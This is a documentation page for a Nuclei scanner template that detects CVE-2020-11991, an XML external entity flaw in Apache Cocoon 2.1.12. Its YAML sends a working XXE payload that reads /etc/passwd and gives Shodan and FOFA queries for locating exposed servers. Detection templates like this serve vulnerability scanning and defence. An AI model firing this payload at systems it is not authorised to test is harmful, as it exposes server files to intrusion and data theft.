Skip to content
Nuclei Templates

Apache Cocoon 2.1.12 - XML Injection

ID: CVE-2020-11991

Severity: high

Author: pikpikcu

Tags: cve,cve2020,apache,xml,cocoon,xxe

Description

Section titled “Description”

Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.

YAML Source

Section titled “YAML Source”
id: CVE-2020-11991


info:
  name: Apache Cocoon 2.1.12 - XML Injection
  author: pikpikcu
  severity: high
  description: Apache Cocoon 2.1.12 is susceptible to  XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and remote code execution.
  remediation: Upgrade to Apache Cocoon 2.1.13 or later.
  reference:
    - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11991
    - https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/H4ckTh3W0r1d/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-11991
    cwe-id: CWE-611
    epss-score: 0.81306
    epss-percentile: 0.98339
    cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: cocoon
    shodan-query:
      - http.html:"Apache Cocoon"
      - http.html:"apache cocoon"
    fofa-query: body="apache cocoon"
  tags: cve,cve2020,apache,xml,cocoon,xxe


http:
  - method: POST
    path:
      - "{{BaseURL}}/v2/api/product/manger/getInfo"


    body: |
      <!--?xml version="1.0" ?-->
      <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
      <userInfo>
      <firstName>John</firstName>
      <lastName>&ent;</lastName>
      </userInfo>


    headers:
      Content-Type: "text/xml"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d2c584ae061f41faca9a2c0037cfcb7c33a71826e803caf0cc1b6ca9c4b4b938022002978ff0cf686cda347a7d4be58fe969996089d0491229c1a954755edf713153:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-11991.yaml"

View on Github